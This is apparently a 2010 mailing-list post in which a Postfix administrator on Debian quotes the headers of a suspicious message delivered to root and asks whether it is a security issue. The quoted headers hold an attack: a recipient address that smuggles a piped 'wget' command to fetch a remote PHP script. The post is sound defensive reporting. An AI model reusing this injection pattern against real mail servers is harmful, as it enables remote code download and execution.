Hi,

I just received the following mail in my root account's local inbox:

>From b...@dick.com  Fri Apr  9 17:54:55 2010
Return-Path: <b...@dick.com>
X-Original-To: "root+:|wget http://fortunes.in/x1x.php";
Delivered-To: "root+:|wget http://fortunes.in/x1x.php"@somedomain.de
Received: from bluedick (unknown [208.88.6.50])
        by mail.somedomain.de (Postfix) with SMTP id 800FC35405B
        for <"root+:|wget http://fortunes.in/x1x.php";>; Fri,  9 Apr 2010
17:54:55 +0200 (CEST)
Message-Id: <20100409155455.800fc354...@mail.somedomain.de>
Date: Fri,  9 Apr 2010 17:54:55 +0200 (CEST)
From: b...@dick.com
To: undisclosed-recipients:;
Status: RO


This appears to be some kind of attack (possibly not specifically aimed
at postfix), that tries to exploit some mailer problem and trick the
system into executing a command (wget). I can not tell for sure if it
succeeded, at least I did not find an "x1x*" file anywhere on my system.

However, at least it succeeded in one thing, that is tricking out the
"aliases" mechanism. Normally, mail to root on my system is forwarded to
an external address as per:

root: u...@somedomain.cx

in /etc/aliases

In this case, however, the mail landed in my local inbox, so it appears
in this case postfix did not do what it was supposed to do.

Can anyone tell if this is something that should be addressed as a
security issue? Can this kind of attack potentially do any harm other
than deliver mail to the local inbox?

Here are some system parameters:

I am running debian 5.0.4, postfix 2.5.5-1.1.

Here is my postconf -n:

alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
append_dot_mydomain = no
biff = no
config_directory = /etc/postfix
inet_interfaces = all
mailbox_size_limit = 0
mydestination =
somedomain.de,someotherdomain.de,localhost.localdomain,localhost
myhostname = mail.somedomain.de
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
myorigin = /etc/mailname
readme_directory = no
recipient_delimiter = +
relayhost =
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtpd_banner = $myhostname ESMTP
smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtpd_use_tls = yes

Regards,

Arno


-- 
Arno Schäfer
IT-Beratung & Softwareentwicklung

PHP - Java - Web-Anwendungen
Linux/Unix - MySQL - Hochverfügbarkeit - Security

Weilbornstraße 10 - 63303 Dreieich
mailto: arno_schae...@gmx.de
Tel. +49-6103-699967 | Mobil +49-171-7939236

Reply via email to